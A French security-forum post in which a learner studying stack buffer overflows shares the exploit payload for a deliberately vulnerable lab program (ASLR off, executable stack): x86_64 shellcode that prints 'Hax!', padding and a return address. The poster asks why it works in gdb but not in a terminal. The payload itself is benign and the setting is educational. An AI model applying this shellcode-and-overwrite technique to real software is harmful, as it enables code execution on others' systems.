Accueil du forum
Tableau de bord
Liste des membres
Qui est en ligne?
Mon profil
Messages privés
Nouveau message
Recherche
Calendrier
Zine
URL de redirection
Créer un PasteBin
Classement (Top 100)
Proposez un challenge! 
Hacking
Hacking 
Messages: 32 835
Client IRC en ligne
|
demande de détail sur la sortie de mon buffer overflow
|
|
29-03-2016, 16h03
(Modification du message : 29-03-2016, 16h05 par Athar.)
Message : #1
|
|
Athar
Newbie  Messages : 7 Sujets : 2 Points: 0 Inscription : May 2013 |
demande de détail sur la sortie de mon buffer overflow
Bonjour j'étudie les buffer overflow et création de shellcode sur mon ubuntu 14.04 lts x86_64.
Je comprends les principes de la stack. Voilà j'ai un tutoriel qu je suis actuellement, mais j'ai deux sortie différentes , l'un sous gdb , l'autre depuis un terminal classique. Le but étant d'affiche le string du shellcode, " Hax! " ASLR est à 0 Compilation:gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g Je prend l'habitude de revérifié si la pile est exécutable (-zexecstack) par un Code : root@krihna:/home/krihna/buffer# execstack -q oldskoolSous GDB: Code : (gdb) r $(python -c 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" + "A"*27 +"\xf0\xe3\xff\xff\xff\x7f"')Sous un terminal en root, j'obtiens une erreur, que je n'arrive pas à "gérer". Code : root@krihna:/home/krihna/buffer# ./oldskool `python -c 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" + "A"*27 +"\xf0\xe3\xff\xff\xff\x7f"'`et Non-root: Code : krihna@krihna:~/buffer$ Starting program: /home/krihna/buffer/oldskool $(python -c 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" + "A"*27 +"\xf0\xe3\xff\xff\xff\x7f"')J'ai aussi essayé de modifié le padding (si c'est bien le bon terme)"A"*27. Si quelqu'un pouvais me mettre sur une piste. Merci à vous. |
|
|
|
|
« Sujet précédent | Sujet suivant »
|
| Messages dans ce sujet |
|
demande de détail sur la sortie de mon buffer overflow - par Athar - 29-03-2016, 16h03
RE: demande de détail sur la sortie de mon buffer overflow - par Athar - 29-03-2016, 17h08
RE: demande de détail sur la sortie de mon buffer overflow - par supersnail - 29-03-2016, 18h36
RE: demande de détail sur la sortie de mon buffer overflow - par Athar - 29-03-2016, 19h27
RE: demande de détail sur la sortie de mon buffer overflow - par gruik - 30-03-2016, 11h35
RE: demande de détail sur la sortie de mon buffer overflow - par Athar - 30-03-2016, 16h20
|
Utilisateur(s) parcourant ce sujet : 1 visiteur(s)